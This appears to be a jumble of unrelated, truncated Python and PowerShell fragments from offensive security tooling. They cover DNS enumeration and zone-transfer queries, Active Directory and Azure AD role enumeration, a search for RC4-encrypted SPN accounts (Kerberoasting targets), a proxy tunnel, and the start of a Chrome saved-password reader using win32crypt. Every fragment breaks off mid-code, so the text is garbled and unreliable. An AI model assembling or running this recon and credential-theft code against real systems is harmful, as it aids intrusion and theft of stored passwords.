import subprocess
import sys

def run_dnsenum(wordlist, dns_server, domain_file):
    with open(domain_file, 'r') as file:
        domains = file.readlines()
    for domain in domains:
        domain = domain.strip()
        command = [

import dns.query
import dns.zone
import sys

def axfr_query(domain, nameserver):
    try:
        zone = dns.zone.from_xfr(dns.query.xfr(nameserver, domain))
        return zone
    except Exception:
        return None

param(
    [string]$filePath
)
Import-Module ActiveDirectory
Get-Content $filePath | ForEach-Object {
    $groupName = $_
    Write-Host "`nGroup-Name $groupName"
    Write-Host "----------------"

# Import the Active Directory module
Import-Module ActiveDirectory
# Group name to search for
$groupName = "YourGroupName"
# Get the group
$group = Get-ADGroup -Filter { Name -eq $groupName }
if ($group -ne $null) {

import paramiko
import socket
import select

def http_connect_tunnel(proxy_host, proxy_port, target_host, target_port):
    """
    Establish an HTTP CONNECT tunnel through a proxy.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((proxy_host, proxy_port))

# Import the Active Directory module
Import-Module ActiveDirectory
# Search for all AD objects with SPNs
$objectsWithSPN = Get-ADObject -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each object and check for RC4 encryption
foreach ($obj in $objectsWithSPN) {
    $name = $obj.Name
    $spns = $obj.ServicePrincipalName

# Import the Active Directory module
Import-Module ActiveDirectory
# Enumerate all user accounts with SPNs
$usersWithSPN = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each user and check for RC4 encryption
foreach ($user in $usersWithSPN) {
    $userName = $user.SamAccountName
    $spns = $user.ServicePrincipalName

import sqlite3
import shutil
import os
import win32crypt
from importlib import import_module

def get_chrome_db_path():
    """Determine the path of the Chrome history database based on the operating system."""
    if os.name == "nt":  # Windows
        return f"C:\\Users\\{os.getlogin()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

# Import the required module if not already imported
Import-Module AzureAD
# Login to Azure AD
Connect-AzureAD
# Get the 'Application Admin' role
$appAdminRole = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Application Admin'}
# If the role hasn't been instantiated, instantiate it

# Install the AzureAD PowerShell module
Install-Module AzureAD
# Authenticate to the tenant
$username = "username@domain.com"
$password = 'YourVeryStrongPassword'
$SecurePassword = ConvertTo-SecureString "$password" -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($username, $SecurePassword)
Connect-AzureAD -Credential $Credential
# Build our users and roles object
$UserRoles = Get-AzureADDirectoryRole | ForEach-Object {
    $Role = $_